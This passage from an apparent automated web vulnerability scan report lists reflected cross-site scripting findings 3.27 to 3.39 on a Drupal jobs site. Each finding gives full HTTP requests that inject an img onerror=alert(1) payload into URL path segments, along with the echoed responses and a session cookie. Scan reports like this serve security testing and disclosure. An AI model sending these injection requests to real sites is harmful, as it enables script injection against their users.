This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /misc6db47"><img%20src%3da%20onerror%3dalert(1)>44ae54b8308/drupal.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:34:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:34:07 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="misc6db47"><img src=a onerror=alert(1)>44ae54b8308-drupal.js not-front not-logged-in page-misc6db47img-srca-onerroralert144ae54b8308 no-sidebars">
...[SNIP]...

3.27. http://jobs.ctg.eu/misc/drupal.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /misc/drupal.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4212b"><img%20src%3da%20onerror%3dalert(1)>a9b9e94b7d6 was submitted in the REST URL parameter 2. This input was echoed as 4212b"><img src=a onerror=alert(1)>a9b9e94b7d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /misc/drupal.js4212b"><img%20src%3da%20onerror%3dalert(1)>a9b9e94b7d6?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:36:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:36:09 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="misc-drupal.js4212b"><img src=a onerror=alert(1)>a9b9e94b7d6 not-front not-logged-in page-misc no-sidebars">
...[SNIP]...

3.28. http://jobs.ctg.eu/misc/jquery.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /misc/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40742"><img%20src%3da%20onerror%3dalert(1)>31ba6936dc0 was submitted in the REST URL parameter 1. This input was echoed as 40742"><img src=a onerror=alert(1)>31ba6936dc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /misc40742"><img%20src%3da%20onerror%3dalert(1)>31ba6936dc0/jquery.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:35:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:35:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="misc40742"><img src=a onerror=alert(1)>31ba6936dc0-jquery.js not-front not-logged-in page-misc40742img-srca-onerroralert131ba6936dc0 no-sidebars">
...[SNIP]...

3.29. http://jobs.ctg.eu/misc/jquery.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /misc/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f59a7"><img%20src%3da%20onerror%3dalert(1)>a304b595f21 was submitted in the REST URL parameter 2. This input was echoed as f59a7"><img src=a onerror=alert(1)>a304b595f21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /misc/jquery.jsf59a7"><img%20src%3da%20onerror%3dalert(1)>a304b595f21?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:36:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:36:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="misc-jquery.jsf59a7"><img src=a onerror=alert(1)>a304b595f21 not-front not-logged-in page-misc no-sidebars">
...[SNIP]...

3.30. http://jobs.ctg.eu/modules/node/node.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/node/node.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2215b"><img%20src%3da%20onerror%3dalert(1)>082ddcb195 was submitted in the REST URL parameter 1. This input was echoed as 2215b"><img src=a onerror=alert(1)>082ddcb195 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules2215b"><img%20src%3da%20onerror%3dalert(1)>082ddcb195/node/node.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:30:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:30:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules2215b"><img src=a onerror=alert(1)>082ddcb195-node-node.css not-front not-logged-in page-modules2215bimg-srca-onerroralert1082ddcb195 no-sidebars">
...[SNIP]...

3.31. http://jobs.ctg.eu/modules/node/node.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/node/node.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6084"><img%20src%3da%20onerror%3dalert(1)>79d8aaa6a1b was submitted in the REST URL parameter 2. This input was echoed as c6084"><img src=a onerror=alert(1)>79d8aaa6a1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/nodec6084"><img%20src%3da%20onerror%3dalert(1)>79d8aaa6a1b/node.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:32:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:32:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules-nodec6084"><img src=a onerror=alert(1)>79d8aaa6a1b-node.css not-front not-logged-in page-modules no-sidebars">
...[SNIP]...

3.32. http://jobs.ctg.eu/modules/node/node.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/node/node.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36cfd"><img%20src%3da%20onerror%3dalert(1)>0112b661d83 was submitted in the REST URL parameter 3. This input was echoed as 36cfd"><img src=a onerror=alert(1)>0112b661d83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/node/node.css36cfd"><img%20src%3da%20onerror%3dalert(1)>0112b661d83?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules-node-node.css36cfd"><img src=a onerror=alert(1)>0112b661d83 not-front not-logged-in page-modules no-sidebars">
...[SNIP]...

3.33. http://jobs.ctg.eu/modules/system/defaults.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2480"><img%20src%3da%20onerror%3dalert(1)>6e90a398a07 was submitted in the REST URL parameter 1. This input was echoed as c2480"><img src=a onerror=alert(1)>6e90a398a07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modulesc2480"><img%20src%3da%20onerror%3dalert(1)>6e90a398a07/system/defaults.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:30:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:30:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modulesc2480"><img src=a onerror=alert(1)>6e90a398a07-system-defaults.css not-front not-logged-in page-modulesc2480img-srca-onerroralert16e90a398a07 no-sidebars">
...[SNIP]...

3.34. http://jobs.ctg.eu/modules/system/defaults.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b1b0"><img%20src%3da%20onerror%3dalert(1)>5dcfcce2e62 was submitted in the REST URL parameter 2. This input was echoed as 6b1b0"><img src=a onerror=alert(1)>5dcfcce2e62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/system6b1b0"><img%20src%3da%20onerror%3dalert(1)>5dcfcce2e62/defaults.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:32:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:32:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules-system6b1b0"><img src=a onerror=alert(1)>5dcfcce2e62-defaults.css not-front not-logged-in page-modules no-sidebars">
...[SNIP]...

3.35. http://jobs.ctg.eu/modules/system/defaults.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb2fe"><img%20src%3da%20onerror%3dalert(1)>e5a5118278f was submitted in the REST URL parameter 3. This input was echoed as bb2fe"><img src=a onerror=alert(1)>e5a5118278f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/system/defaults.cssbb2fe"><img%20src%3da%20onerror%3dalert(1)>e5a5118278f?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules-system-defaults.cssbb2fe"><img src=a onerror=alert(1)>e5a5118278f not-front not-logged-in page-modules no-sidebars">
...[SNIP]...

3.36. http://jobs.ctg.eu/modules/system/system-menus.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload beda8"><img%20src%3da%20onerror%3dalert(1)>6e4c1ce2860 was submitted in the REST URL parameter 1. This input was echoed as beda8"><img src=a onerror=alert(1)>6e4c1ce2860 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modulesbeda8"><img%20src%3da%20onerror%3dalert(1)>6e4c1ce2860/system/system-menus.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:30:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:30:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modulesbeda8"><img src=a onerror=alert(1)>6e4c1ce2860-system-system-menus.css not-front not-logged-in page-modulesbeda8img-srca-onerroralert16e4c1ce2860 no-sidebars">
...[SNIP]...

3.37. http://jobs.ctg.eu/modules/system/system-menus.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93062"><img%20src%3da%20onerror%3dalert(1)>1f99fd27bf was submitted in the REST URL parameter 2. This input was echoed as 93062"><img src=a onerror=alert(1)>1f99fd27bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/system93062"><img%20src%3da%20onerror%3dalert(1)>1f99fd27bf/system-menus.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:32:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:32:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules-system93062"><img src=a onerror=alert(1)>1f99fd27bf-system-menus.css not-front not-logged-in page-modules no-sidebars">
...[SNIP]...

3.38. http://jobs.ctg.eu/modules/system/system-menus.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91038"><img%20src%3da%20onerror%3dalert(1)>24b23078d8b was submitted in the REST URL parameter 3. This input was echoed as 91038"><img src=a onerror=alert(1)>24b23078d8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/system/system-menus.css91038"><img%20src%3da%20onerror%3dalert(1)>24b23078d8b?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:17 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules-system-system-menus.css91038"><img src=a onerror=alert(1)>24b23078d8b not-front not-logged-in page-modules no-sidebars">
...[SNIP]...

3.39. http://jobs.ctg.eu/modules/system/system.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a02d"><img%20src%3da%20onerror%3dalert(1)>ae1a910df3b was submitted in the REST URL parameter 1. This input was echoed as 1a02d"><img src=a onerror=alert(1)>ae1a910df3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules1a02d"><img%20src%3da%20onerror%3dalert(1)>ae1a910df3b/system/system.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:30:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:30:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
